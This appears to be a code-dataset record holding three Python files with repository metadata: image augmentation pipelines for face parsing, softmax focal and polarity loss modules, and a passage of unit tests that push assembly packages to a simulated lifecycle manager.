| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7ef351c5391cd71679a57af43c1e53990f224ff0
| 18,709
|
py
|
Python
|
data_augmentation.py
|
aod321/new_train
|
23bf0a64ac274433cbc372898d97ae9d1aa5f6cd
|
[
"BSD-2-Clause"
] | 16
|
2020-07-11T07:53:49.000Z
|
2022-03-10T11:52:31.000Z
|
data_augmentation.py
|
aod321/new_train
|
23bf0a64ac274433cbc372898d97ae9d1aa5f6cd
|
[
"BSD-2-Clause"
] | 1
|
2020-08-12T07:57:47.000Z
|
2021-08-31T15:08:23.000Z
|
data_augmentation.py
|
aod321/new_train
|
23bf0a64ac274433cbc372898d97ae9d1aa5f6cd
|
[
"BSD-2-Clause"
] | 1
|
2022-02-28T10:32:43.000Z
|
2022-02-28T10:32:43.000Z
|
from torch.utils.data import ConcatDataset
from torchvision import transforms
from preprocess import Resize, GaussianNoise, RandomAffine, \
ToPILImage, ToTensor, Stage2_ToTensor, Stage2_RandomAffine, Stage2_GaussianNoise, Stage2ToPILImage, OrigPad, \
Stage2_nose_mouth_RandomAffine, Skin_ToTensor, Stage1ToTensor
class Stage1Augmentation(object):
def __init__(self, dataset, txt_file, root_dir, parts_root_dir, resize):
self.augmentation_name = ['origin', 'choice1', 'choice2', 'choice3', 'choice4']
self.randomchoice = None
self.transforms = None
self.transforms_list = None
self.dataset = dataset
self.txt_file = txt_file
self.root_dir = root_dir
self.parts_root_dir = parts_root_dir
self.resize = resize
self.set_choice()
self.set_transformers()
self.set_transforms_list()
def set_choice(self):
degree = 15
translate_range = (0.1, 0.1)
scale_range = (0.9, 1.2)
choice = {
# random_choice 1:
self.augmentation_name[1]: [GaussianNoise(),
RandomAffine(degrees=degree, translate=translate_range,
scale=scale_range),
transforms.Compose([GaussianNoise(),
RandomAffine(degrees=degree, translate=translate_range,
scale=scale_range)
]
)
],
# random_choice 2: R, S, T
self.augmentation_name[2]: [
RandomAffine(degrees=degree, translate=None,
scale=None),
RandomAffine(degrees=0, translate=None,
scale=(0.8, 1.5)),
RandomAffine(degrees=0, translate=(0.3, 0.3),
scale=None)
],
# random_choice 3: RT, RS, ST
self.augmentation_name[3]: [
RandomAffine(degrees=degree, translate=translate_range,
scale=None),
RandomAffine(degrees=degree, translate=None,
scale=scale_range),
RandomAffine(degrees=0, translate=translate_range,
scale=scale_range),
],
# random_choice 4: RST
self.augmentation_name[4]: [
RandomAffine(degrees=degree, translate=translate_range,
scale=scale_range),
]
}
self.randomchoice = choice
def set_resize(self, resize):
self.resize = resize
def set_transformers(self):
self.transforms = {
self.augmentation_name[0]: transforms.Compose([
ToPILImage(),
Resize(self.resize),
Stage1ToTensor()
]),
self.augmentation_name[1]: transforms.Compose([
ToPILImage(),
# Choose from tranforms_list randomly
transforms.RandomChoice(self.randomchoice['choice1']),
Resize(self.resize),
Stage1ToTensor()
]),
self.augmentation_name[2]: transforms.Compose([
ToPILImage(),
transforms.RandomChoice(self.randomchoice['choice2']),
Resize(self.resize),
Stage1ToTensor()
]),
self.augmentation_name[3]: transforms.Compose([
ToPILImage(),
transforms.RandomChoice(self.randomchoice['choice3']),
Resize(self.resize),
Stage1ToTensor()
]),
self.augmentation_name[4]: transforms.Compose([
ToPILImage(),
transforms.RandomChoice(self.randomchoice['choice4']),
Resize(self.resize),
Stage1ToTensor()
])
}
def set_transforms_list(self):
self.transforms_list = {
'train':
self.transforms,
'val':
self.transforms['origin']
}
def get_dataset(self):
datasets = {'train': [self.dataset(txt_file=self.txt_file['train'],
root_dir=self.root_dir,
parts_root_dir=self.parts_root_dir,
transform=self.transforms_list['train'][r],
stage='stage1'
)
for r in self.augmentation_name],
'val': self.dataset(txt_file=self.txt_file['val'],
root_dir=self.root_dir,
parts_root_dir=self.parts_root_dir,
transform=self.transforms_list['val'],
stage='stage1'
)
}
enhaced_datasets = {'train': ConcatDataset(datasets['train']),
'val': datasets['val']
}
return enhaced_datasets
class Stage2Augmentation(object):
def __init__(self, dataset, txt_file, root_dir, resize=None):
self.augmentation_name = ['origin', 'choice1', 'choice2', 'choice3', 'choice4']
# self.augmentation_name = ['origin', 'choice1']
self.randomchoice = None
self.transforms = None
self.transforms_list = None
self.dataset = dataset
self.txt_file = txt_file
self.root_dir = root_dir
self.resize = resize
self.set_choice()
self.set_transformers()
self.set_transforms_list()
def set_choice(self):
degree_small = (-15, 15)
degree_large = (-15, 15)
None_degree = 0
translate_small = (0.1, 0.1)
translate_normal = (0.3, 0.3)
scale_small = (0.8, 1)
scale_mouth_translate = (0.8, 1)
scale_large = (1, 1.5)
scale_with_translate = (1, 1)
def rand_affine(degree_eyes, degree_mouth, translate_eyes, translate_mouth, scale_eyes, scale_mouth,
noise=False):
if not noise:
out = transforms.RandomOrder(
[Stage2_RandomAffine(degrees=degree_eyes, translate=translate_eyes,
scale=scale_eyes),
Stage2_nose_mouth_RandomAffine(degrees=degree_mouth, translate=translate_mouth,
scale=scale_mouth)
]
)
else:
out = transforms.Compose([
Stage2_GaussianNoise(),
transforms.RandomOrder([
Stage2_RandomAffine(degrees=degree_eyes, translate=translate_eyes,
scale=scale_eyes),
Stage2_nose_mouth_RandomAffine(degrees=degree_mouth,
translate=translate_mouth,
scale=scale_mouth)
])
]
)
return out
choice = {
# random_choice 1: 30 rotaion, scale, translate, noise (random_order)
# R, S, T, N
self.augmentation_name[1]: [
# rotate only
rand_affine(degree_eyes=degree_large, degree_mouth=degree_large, translate_eyes=None,
translate_mouth=None, scale_eyes=None, scale_mouth=None),
# scale only
rand_affine(degree_eyes=None_degree, degree_mouth=None_degree, translate_eyes=None,
translate_mouth=None, scale_eyes=scale_large, scale_mouth=scale_small),
# translate only
rand_affine(degree_eyes=None_degree, degree_mouth=None_degree, translate_eyes=translate_normal,
translate_mouth=translate_small, scale_eyes=None, scale_mouth=None),
# noise only
Stage2_GaussianNoise()
],
self.augmentation_name[2]: [
# RS,RT,RN,ST,SN,TN
rand_affine(degree_eyes=degree_small, degree_mouth=degree_large, translate_eyes=None,
translate_mouth=None, scale_eyes=scale_large, scale_mouth=scale_small),
rand_affine(degree_eyes=degree_small, degree_mouth=degree_large, translate_eyes=translate_normal,
translate_mouth=translate_small, scale_eyes=None, scale_mouth=None),
rand_affine(degree_eyes=degree_small, degree_mouth=degree_large, translate_eyes=None,
translate_mouth=None, scale_eyes=None, scale_mouth=None,
noise=True),
rand_affine(degree_eyes=None_degree, degree_mouth=None_degree, translate_eyes=translate_normal,
translate_mouth=translate_normal,
scale_eyes=scale_with_translate, scale_mouth=scale_mouth_translate),
rand_affine(degree_eyes=None_degree, degree_mouth=None_degree, translate_eyes=None,
translate_mouth=None, scale_eyes=scale_large, scale_mouth=scale_small,
noise=True),
rand_affine(degree_eyes=None_degree, degree_mouth=None_degree, translate_eyes=translate_normal,
translate_mouth=translate_small, scale_eyes=None, scale_mouth=None,
noise=True)
],
# RST, RSN, RTN, STN
self.augmentation_name[3]: [
transforms.RandomOrder([
rand_affine(degree_eyes=degree_small, degree_mouth=degree_large, translate_eyes=translate_normal,
translate_mouth=translate_normal, scale_eyes=scale_with_translate,
scale_mouth=scale_mouth_translate),
rand_affine(degree_eyes=degree_small, degree_mouth=degree_large, translate_eyes=None,
translate_mouth=None, scale_eyes=scale_large, scale_mouth=scale_small,
noise=True),
rand_affine(degree_eyes=degree_small, degree_mouth=degree_large, translate_eyes=translate_normal,
translate_mouth=translate_small, scale_eyes=None, scale_mouth=None,
noise=True),
rand_affine(degree_eyes=None_degree, degree_mouth=None_degree, translate_eyes=translate_normal,
translate_mouth=translate_normal,
scale_eyes=scale_with_translate, scale_mouth=scale_mouth_translate,
noise=True),
])
],
# RSTN
self.augmentation_name[4]: [
rand_affine(degree_eyes=degree_small, degree_mouth=degree_large, translate_eyes=translate_normal,
translate_mouth=translate_normal,
scale_eyes=scale_with_translate, scale_mouth=scale_mouth_translate,
noise=True)
]
}
self.randomchoice = choice
def set_resize(self, resize):
self.resize = resize
def set_transformers(self):
self.transforms = {
self.augmentation_name[0]: transforms.Compose([
Stage2ToPILImage(),
Stage2_ToTensor()
]),
self.augmentation_name[1]: transforms.Compose([
Stage2ToPILImage(),
transforms.RandomChoice(self.randomchoice['choice1']),
Stage2_ToTensor()
]),
self.augmentation_name[2]: transforms.Compose([
Stage2ToPILImage(),
transforms.RandomChoice(self.randomchoice['choice2']),
Stage2_ToTensor()
]),
self.augmentation_name[3]: transforms.Compose([
Stage2ToPILImage(),
transforms.RandomChoice(self.randomchoice['choice3']),
Stage2_ToTensor()
]),
self.augmentation_name[4]: transforms.Compose([
Stage2ToPILImage(),
transforms.RandomChoice(self.randomchoice['choice4']),
Stage2_ToTensor()
])
}
def set_transforms_list(self):
self.transforms_list = {
'train':
self.transforms,
'val':
self.transforms['origin']
}
def get_dataset(self):
datasets = {'train': [self.dataset(txt_file=self.txt_file['train'],
root_dir=self.root_dir,
transform=self.transforms_list['train'][r]
)
for r in self.augmentation_name],
'val': self.dataset(txt_file=self.txt_file['val'],
root_dir=self.root_dir,
transform=self.transforms_list['val']
)
}
enhaced_datasets = {'train': ConcatDataset(datasets['train']),
'val': datasets['val']
}
return enhaced_datasets
class SkinHairAugmentation(object):
def __init__(self, dataset, txt_file, root_dir, resize):
self.augmentation_name = ['origin', 'choice1', 'choice2', 'choice3', 'choice4']
self.randomchoice = None
self.transforms = None
self.transforms_list = None
self.dataset = dataset
self.txt_file = txt_file
self.root_dir = root_dir
self.resize = resize
self.set_choice()
self.set_transformers()
self.set_transforms_list()
def set_choice(self):
degree = 15
translate_range = (0.1, 0.1)
scale_range = (0.9, 1.2)
choice = {
# random_choice 1:
self.augmentation_name[1]: [GaussianNoise(),
RandomAffine(degrees=degree, translate=translate_range,
scale=scale_range),
transforms.Compose([GaussianNoise(),
RandomAffine(degrees=degree, translate=translate_range,
scale=scale_range)
]
)
],
# random_choice 2: R, S, T
self.augmentation_name[2]: [
RandomAffine(degrees=degree, translate=None,
scale=None),
RandomAffine(degrees=0, translate=None,
scale=(0.8, 1.5)),
RandomAffine(degrees=0, translate=(0.3, 0.3),
scale=None)
],
# random_choice 3: RT, RS, ST
self.augmentation_name[3]: [
RandomAffine(degrees=degree, translate=translate_range,
scale=None),
RandomAffine(degrees=degree, translate=None,
scale=scale_range),
RandomAffine(degrees=0, translate=translate_range,
scale=scale_range),
],
# random_choice 4: RST
self.augmentation_name[4]: [
RandomAffine(degrees=degree, translate=translate_range,
scale=scale_range),
]
}
self.randomchoice = choice
def set_resize(self, resize):
self.resize = resize
def set_transformers(self):
self.transforms = {
self.augmentation_name[0]: transforms.Compose([
ToPILImage(),
Resize(self.resize),
Skin_ToTensor()
]),
self.augmentation_name[1]: transforms.Compose([
ToPILImage(),
# Choose from tranforms_list randomly
transforms.RandomChoice(self.randomchoice['choice1']),
Resize(self.resize),
Skin_ToTensor()
]),
self.augmentation_name[2]: transforms.Compose([
ToPILImage(),
transforms.RandomChoice(self.randomchoice['choice2']),
Resize(self.resize),
Skin_ToTensor()
]),
self.augmentation_name[3]: transforms.Compose([
ToPILImage(),
transforms.RandomChoice(self.randomchoice['choice3']),
Resize(self.resize),
Skin_ToTensor()
]),
self.augmentation_name[4]: transforms.Compose([
ToPILImage(),
transforms.RandomChoice(self.randomchoice['choice4']),
Resize(self.resize),
Skin_ToTensor()
])
}
def set_transforms_list(self):
self.transforms_list = {
'train':
self.transforms,
'val':
self.transforms['origin']
}
def get_dataset(self):
datasets = {'train': [self.dataset(txt_file=self.txt_file['train'],
root_dir=self.root_dir,
transform=self.transforms_list['train'][r]
)
for r in self.augmentation_name],
'val': self.dataset(txt_file=self.txt_file['val'],
root_dir=self.root_dir,
transform=self.transforms_list['val']
)
}
enhaced_datasets = {'train': ConcatDataset(datasets['train']),
'val': datasets['val']
}
return enhaced_datasets
| 44.545238
| 117
| 0.497621
| 1,566
| 18,709
| 5.683908
| 0.072158
| 0.061117
| 0.076396
| 0.033704
| 0.903494
| 0.882597
| 0.880688
| 0.82912
| 0.823054
| 0.812268
| 0
| 0.015062
| 0.418034
| 18,709
| 419
| 118
| 44.651551
| 0.802443
| 0.025389
| 0
| 0.794595
| 0
| 0
| 0.019766
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051351
| false
| 0
| 0.008108
| 0
| 0.078378
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d396c3346bf83984bd4f715f728267283f0bb30
| 4,325
|
py
|
Python
|
mpa/modules/models/losses/class_balanced_losses.py
|
openvinotoolkit/model_preparation_algorithm
|
8d36bf5944837b7a3d22fc2c3a4cb93423619fc2
|
[
"Apache-2.0"
] | null | null | null |
mpa/modules/models/losses/class_balanced_losses.py
|
openvinotoolkit/model_preparation_algorithm
|
8d36bf5944837b7a3d22fc2c3a4cb93423619fc2
|
[
"Apache-2.0"
] | null | null | null |
mpa/modules/models/losses/class_balanced_losses.py
|
openvinotoolkit/model_preparation_algorithm
|
8d36bf5944837b7a3d22fc2c3a4cb93423619fc2
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcls.models.builder import LOSSES
from mmcls.models.losses.utils import weight_reduce_loss
def focal_loss(pred, target, weight=None, gamma=2.0,
alpha=0.25, reduction='mean', avg_factor=None, ignore_index=None):
if ignore_index is not None:
pred = pred[target != ignore_index]
target = target[target != ignore_index]
pred_softmax = F.softmax(pred, 1)
one_hot = torch.zeros_like(pred)
one_hot = one_hot.scatter(1, target.view(-1, 1), 1)
target = one_hot.type_as(pred)
label_smoothing = 0.8
target = target*label_smoothing+(1-label_smoothing)/(target.shape[1])
pt = (1 - pred_softmax) * target + pred_softmax * (1 - target)
focal_weight = (alpha * target + (1 - alpha) *
(1 - target)) * pt.pow(gamma)
loss = F.binary_cross_entropy_with_logits(
pred, target, reduction='none') * focal_weight
loss = weight_reduce_loss(loss, weight, reduction, avg_factor)
return loss
def polarity_loss(pred, target, weight=None, gamma=2.0,
alpha=0.25, beta=20, reduction='mean', avg_factor=None, ignore_index=None):
if ignore_index is not None:
pred = pred[target != ignore_index]
target = target[target != ignore_index]
pred_softmax = F.softmax(pred, 1)
one_hot = torch.zeros_like(pred)
one_hot = one_hot.scatter(1, target.view(-1, 1), 1)
target = one_hot.type_as(pred)
label_smoothing = 1.0
target = target*label_smoothing+(1-label_smoothing)/(target.shape[1])
penalty = F.sigmoid(beta*(pred_softmax-torch.sum(pred_softmax*target, dim=1, keepdim=True)))
pt = (1 - pred_softmax) * target + pred_softmax * (1 - target)
focal_weight = (alpha * target + (1 - alpha) *
(1 - target)) * pt.pow(gamma)
loss = F.binary_cross_entropy_with_logits(
pred, target, reduction='none') * focal_weight * penalty
loss = weight_reduce_loss(loss, weight, reduction, avg_factor)
return loss
@LOSSES.register_module()
class SoftmaxFocalLoss(nn.Module):
def __init__(self, gamma=2.0, alpha=0.25, reduction='mean', loss_weight=1.0, ignore_index=None):
super(SoftmaxFocalLoss, self).__init__()
self.reduction = reduction
self.loss_weight = loss_weight
self.gamma = gamma
self.alpha = alpha
self.ignore_index = ignore_index
self.cls_criterion = focal_loss
def forward(self,
cls_score,
label,
weight=None,
avg_factor=None,
reduction_override=None,
**kwargs):
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (
reduction_override if reduction_override else self.reduction)
loss_cls = self.loss_weight * self.cls_criterion(
cls_score,
label,
weight,
ignore_index=self.ignore_index,
reduction=reduction,
avg_factor=avg_factor,
**kwargs)
return loss_cls
@LOSSES.register_module()
class SoftmaxPolarityLoss(nn.Module):
def __init__(self, gamma=2.0, alpha=0.25, beta=20,
reduction='mean', loss_weight=1.0, ignore_index=None):
super(SoftmaxPolarityLoss, self).__init__()
self.reduction = reduction
self.loss_weight = loss_weight
self.gamma = gamma
self.alpha = alpha
self.beta = beta
self.ignore_index = ignore_index
self.cls_criterion = polarity_loss
def forward(self,
cls_score,
label,
weight=None,
avg_factor=None,
reduction_override=None,
**kwargs):
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (
reduction_override if reduction_override else self.reduction)
loss_cls = self.loss_weight * self.cls_criterion(
cls_score,
label,
weight,
ignore_index=self.ignore_index,
reduction=reduction,
avg_factor=avg_factor,
**kwargs)
return loss_cls
| 35.45082
| 100
| 0.621503
| 534
| 4,325
| 4.805243
| 0.168539
| 0.077163
| 0.010912
| 0.018706
| 0.830086
| 0.830086
| 0.830086
| 0.830086
| 0.798909
| 0.798909
| 0
| 0.01947
| 0.275607
| 4,325
| 121
| 101
| 35.743802
| 0.799553
| 0.016647
| 0
| 0.764706
| 0
| 0
| 0.010826
| 0
| 0
| 0
| 0
| 0
| 0.019608
| 1
| 0.058824
| false
| 0
| 0.04902
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
adbc6c1c5465760040672c2f7b24b36e7917bd46
| 25,794
|
py
|
Python
|
tests/unit/project_lifecycle/project/assemblytests/test_push.py
|
manojn97/lmctl
|
844925cb414722351efac90cb97f10c1185eef7a
|
[
"Apache-2.0"
] | 3
|
2021-07-19T09:46:01.000Z
|
2022-03-07T13:51:25.000Z
|
tests/unit/project_lifecycle/project/assemblytests/test_push.py
|
manojn97/lmctl
|
844925cb414722351efac90cb97f10c1185eef7a
|
[
"Apache-2.0"
] | 43
|
2019-08-27T12:36:29.000Z
|
2020-08-27T14:50:40.000Z
|
tests/unit/project_lifecycle/project/assemblytests/test_push.py
|
manojn97/lmctl
|
844925cb414722351efac90cb97f10c1185eef7a
|
[
"Apache-2.0"
] | 7
|
2020-09-22T20:32:17.000Z
|
2022-03-29T12:25:51.000Z
|
import unittest
from unittest.mock import call
import os
import tests.common.simulations.project_lab as project_lab
from tests.common.project_testing import (ProjectSimTestCase, PROJECT_CONTAINS_DIR)
from lmctl.project.sessions import EnvironmentSessions
from lmctl.project.package.core import Pkg, PkgContent, PushOptions
from lmctl.project.handlers.assembly.assembly_src import TEMPLATE_CONTENT
WITH_TEMPLATE_ASSEMBLY_TEMPLATE_DESCRIPTOR_YAML = "name: assembly-template::with_template::1.0"
WITH_TEMPLATE_ASSEMBLY_TEMPLATE_DESCRIPTOR_YAML += "\n"
WITH_TEMPLATE_ASSEMBLY_TEMPLATE_DESCRIPTOR_YAML += TEMPLATE_CONTENT
class TestPushAssemblyPkgs(ProjectSimTestCase):
def test_push_creates_descriptor(self):
pkg_sim = self.simlab.simulate_pkg_assembly_basic()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.descriptor_driver.get_descriptor.assert_called_once_with('assembly::basic::1.0')
lm_session.descriptor_driver.create_descriptor.assert_called_once_with('name: assembly::basic::1.0\ndescription: basic_assembly\n')
def test_push_updates_descriptors_if_exists(self):
pkg_sim = self.simlab.simulate_pkg_assembly_basic()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_descriptor('name: assembly::basic::1.0\ndescription: pre-update basic_assembly\n')
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.descriptor_driver.get_descriptor.assert_called_once_with('assembly::basic::1.0')
lm_session.descriptor_driver.create_descriptor.assert_not_called()
lm_session.descriptor_driver.update_descriptor.assert_called_once_with('assembly::basic::1.0', 'name: assembly::basic::1.0\ndescription: basic_assembly\n')
def test_push_creates_descriptor_template(self):
pkg_sim = self.simlab.simulate_pkg_assembly_with_template()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.descriptor_template_driver.get_descriptor_template.assert_called_once_with('assembly-template::with_template::1.0')
lm_session.descriptor_template_driver.create_descriptor_template.assert_called_once_with(WITH_TEMPLATE_ASSEMBLY_TEMPLATE_DESCRIPTOR_YAML)
def test_push_updates_descriptors_template_if_exists(self):
pkg_sim = self.simlab.simulate_pkg_assembly_with_template()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_descriptor_template('name: assembly-template::with_template::1.0\ndescription: pre-update\n')
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.descriptor_template_driver.get_descriptor_template.assert_called_once_with('assembly-template::with_template::1.0')
lm_session.descriptor_template_driver.create_descriptor_template.assert_not_called()
lm_session.descriptor_template_driver.update_descriptor_template.assert_called_once_with('assembly-template::with_template::1.0', WITH_TEMPLATE_ASSEMBLY_TEMPLATE_DESCRIPTOR_YAML)
def test_push_creates_behaviour_configuration(self):
pkg_sim = self.simlab.simulate_pkg_assembly_with_behaviour()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_assembly_configuration.assert_called_once_with({
"name": "simple",
"projectId": "assembly::with_behaviour::1.0",
"description": "a simple assembly config",
"properties": {
"a": "123"
},
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z",
"descriptorName": "assembly::with_behaviour::1.0"
})
def test_push_updates_behaviour_configuration_if_exists(self):
pkg_sim = self.simlab.simulate_pkg_assembly_with_behaviour()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_project({'id': 'assembly::with_behaviour::1.0', 'name': 'assembly::with_behaviour::1.0'})
lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'assembly::with_behaviour::1.0', 'name': 'simple'})
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_assembly_configuration.assert_not_called()
lm_session.behaviour_driver.update_assembly_configuration.assert_called_once_with({
"id": "existing",
"name": "simple",
"projectId": "assembly::with_behaviour::1.0",
"description": "a simple assembly config",
"properties": {
"a": "123"
},
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z",
"descriptorName": "assembly::with_behaviour::1.0"
})
def test_push_creates_behaviour_scenarios(self):
pkg_sim = self.simlab.simulate_pkg_assembly_with_behaviour()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_project({'id': 'assembly::with_behaviour::1.0', 'name': 'assembly::with_behaviour::1.0'})
lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'assembly::with_behaviour::1.0', 'name': 'simple'})
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_scenario.assert_has_calls([
call({
"name": "runtime",
"projectId": "assembly::with_behaviour::1.0",
"description": "a runtime scenario",
"stages": [
{
"name": "Stage One",
"steps": [
{
"stepDefinitionName": "Utilities::SleepForTime",
"properties": {
"sleepTime": "20",
"timeUnit": "seconds"
}
}
]
}
],
"assemblyActors": [
{
"instanceName": "ExistingProvidedAssembly",
"provided": True
}
],
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z"
}),
call({
"name": "test",
"projectId": "assembly::with_behaviour::1.0",
"description": "a test scenario",
"stages": [
{
"name": "Stage One",
"steps": [
{
"stepDefinitionName": "Utilities::SleepForTime",
"properties": {
"sleepTime": "20",
"timeUnit": "seconds"
}
}
]
}
],
"assemblyActors": [
{
"instanceName": "simple",
"assemblyConfigurationId": "existing",
"initialState": "Active",
"uninstallOnExit": True,
"provided": False
}
],
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z"
})
])
def test_push_creates_scenario_with_missing_config(self):
pkg_sim = self.simlab.simulate_pkg_assembly_with_scenario_referencing_missing_config()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_project({'id': 'assembly::with_scenario_referencing_missing_config::1.0', 'name': 'assembly::with_scenario_referencing_missing_config::1.0'})
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_scenario.assert_called_once_with(
{
"name": "test",
"projectId": "assembly::with_scenario_referencing_missing_config::1.0",
"description": "a test scenario",
"stages": [
{
"name": "Stage One",
"steps": [
{
"stepDefinitionName": "Utilities::SleepForTime",
"properties": {
"sleepTime": "20",
"timeUnit": "seconds"
}
}
]
}
],
"assemblyActors": [
{
"instanceName": "simple",
"assemblyConfigurationId": "missing",
"initialState": "Active",
"uninstallOnExit": True,
"provided": False
}
],
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z"
}
)
def test_push_updates_behaviour_scenarios_if_exists(self):
pkg_sim = self.simlab.simulate_pkg_assembly_with_behaviour()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_project({'id': 'assembly::with_behaviour::1.0', 'name': 'assembly::with_behaviour::1.0'})
lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'assembly::with_behaviour::1.0', 'name': 'simple'})
lm_sim.add_scenario({'id': 'existingRuntime', 'projectId': 'assembly::with_behaviour::1.0', 'name': 'runtime'})
lm_sim.add_scenario({'id': 'existingTest', 'projectId': 'assembly::with_behaviour::1.0', 'name': 'test'})
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_scenario.assert_not_called()
lm_session.behaviour_driver.update_scenario.assert_has_calls([
call({
"id": "existingRuntime",
"name": "runtime",
"projectId": "assembly::with_behaviour::1.0",
"description": "a runtime scenario",
"stages": [
{
"name": "Stage One",
"steps": [
{
"stepDefinitionName": "Utilities::SleepForTime",
"properties": {
"sleepTime": "20",
"timeUnit": "seconds"
}
}
]
}
],
"assemblyActors": [
{
"instanceName": "ExistingProvidedAssembly",
"provided": True
}
],
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z"
}),
call({
"id": "existingTest",
"name": "test",
"projectId": "assembly::with_behaviour::1.0",
"description": "a test scenario",
"stages": [
{
"name": "Stage One",
"steps": [
{
"stepDefinitionName": "Utilities::SleepForTime",
"properties": {
"sleepTime": "20",
"timeUnit": "seconds"
}
}
]
}
],
"assemblyActors": [
{
"instanceName": "simple",
"assemblyConfigurationId": "existing",
"initialState": "Active",
"uninstallOnExit": True,
"provided": False
}
],
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z"
})
])
class TestPushAssemblyPkgsSubcontent(ProjectSimTestCase):
def test_push_creates_descriptor(self):
pkg_sim = self.simlab.simulate_pkg_assembly_contains_assembly_basic()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.descriptor_driver.get_descriptor.assert_has_calls([call('assembly::sub_basic-contains_basic::1.0'), call('assembly::contains_basic::1.0')])
lm_session.descriptor_driver.create_descriptor.assert_has_calls([
call('name: assembly::sub_basic-contains_basic::1.0\ndescription: descriptor\n'),
call('name: assembly::contains_basic::1.0\ndescription: basic_assembly\n')])
def test_push_updates_descriptors_if_exists(self):
pkg_sim = self.simlab.simulate_pkg_assembly_contains_assembly_basic()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_descriptor('name: assembly::sub_basic-contains_basic::1.0\ndescription: pre-update\n')
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.descriptor_driver.get_descriptor.assert_has_calls([call('assembly::sub_basic-contains_basic::1.0'), call('assembly::contains_basic::1.0')])
